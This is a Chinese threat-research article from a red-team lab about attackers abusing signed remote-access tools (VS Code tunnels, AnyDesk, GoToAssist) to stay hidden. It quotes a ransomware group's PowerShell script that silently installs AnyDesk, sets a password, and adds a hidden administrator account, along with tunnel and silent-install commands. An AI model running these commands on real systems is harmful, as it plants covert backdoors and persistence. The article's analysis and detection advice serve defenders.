引言
攻击对抗日益激烈的局势下,安全产品的围追堵截使得攻击者将目光逐渐转向合法工具的滥用。通过使用具有合法签名的应用程序进行访问控制可以有效提高攻击隐匿性,也对防守及检测提出新的挑战。本文以Vscode、AnyDesk、GotoAssist为例探索攻击者用于访问控制的一些合法程序。
01 使用Vscode进行远程控制
VScode作为常见编辑器,其具有远程连接功能,官方提供免安装版CLI客户端无疑给攻击者的滥用提供了便利。
通过命令行调用tunnel模式,攻击者可以便捷的启动受控端。
code.exe tunnel --accept-server-license-terms --no-sleep --random-name
使用返回的认证码进行登录认证:
认证成功后使用返回的控制地址即可进行访问控制:
使用VScode进行远程控制,Agent端会与github进行通信,融入正常业务的与可信域名的C2通信配合其合法签名的应用程序,在受害者为IT部门或是服务器时会使防守方难以察觉。
02 使用AnyDesk进行远程控制
作为一款商用远控软件,有大量企业或是员工个人会在工作中使用AnyDesk进行远程办公,这就导致攻击者可以鱼目混珠使用AnyDesk作为后门进行远程攻击。从开源情报分析可以看到勒索组织有使用AnyDesk进行攻击的PS1武器脚本:
Function AnyDesk {
mkdir "C:\ProgramData\AnyDesk"
# Download AnyDesk
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:\ProgramData\AnyDesk.exe"
$clnt.DownloadFile($url,$file)
cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
cmd.exe /c echo b4ouDLG9trr | C:\ProgramData\anydesk.exe --set-password
net user WDAGUtilltyAccount "qv69t4p#Z0kE3" /add
net localgroup Administrators WDAGUtilltyAccount /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v WDAGUtilltyAccount /t REG_DWORD /d 0 /f
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}
通过Powershell远程下载AnyDesk并静默安装后便可以远程访问:
但同时客户端也会在本地日志中记录连接的信息,意味着在连接的同时,攻击者的包括来源IP等信息会记录在目标机器,为溯源等操作留下便利。
03 使用GotoAssist进行远程控制
因为AnyDesk的局限性以及隐蔽性问题,攻击者开始把目光转移到新型云平台远控软件,以GotoAssist为例,其便于安装的客户端,以及安装后自带的服务自启动,使得攻击者可以更隐蔽的进行渗透。
下载无人值守模式安装程序后,通过MSIEXEC进行静默安装后,可以使用web端直接连接:
msiexec /i GoToAssist_Remote_Support_Unattended.msi /quiet
默认安装后GoToAssist会创建自启动服务,可以起到权限维持的效果:
04 总结
相比于传统C2在正面与杀软对抗,使用商用控制软件进行隐秘渗透不失为一种思路。合法的通信使得防守设备会难以分辨攻击者的流量与正常业务流量,而商用控制软件大多都带有完整的一套功能,包括文件管理、远程桌面等,此类功能也方便了攻击者进行渗透活动。商用控制软件有着较为明显且固定的通信地址,检测难点在与区分使用者是否为合法人员,终端侧的日志捕获或许是一个思路。
绿盟科技天元实验室专注于新型实战化攻防对抗技术研究。
研究目标包括:漏洞利用技术、防御绕过技术、攻击隐匿技术、攻击持久化技术等蓝军技术,以及攻击技战术、攻击框架的研究。涵盖Web安全、终端安全、AD安全、云安全等多个技术领域的攻击技术研究,以及工业互联网、车联网等业务场景的攻击技术研究。通过研究攻击对抗技术,从攻击视角提供识别风险的方法和手段,为威胁对抗提供决策支撑。
M01N Team公众号
聚焦高级攻防对抗热点技术
绿盟科技蓝军技术研究战队
官方攻防交流群
网络安全一手资讯
攻防技术答疑解惑
扫码加好友即可拉群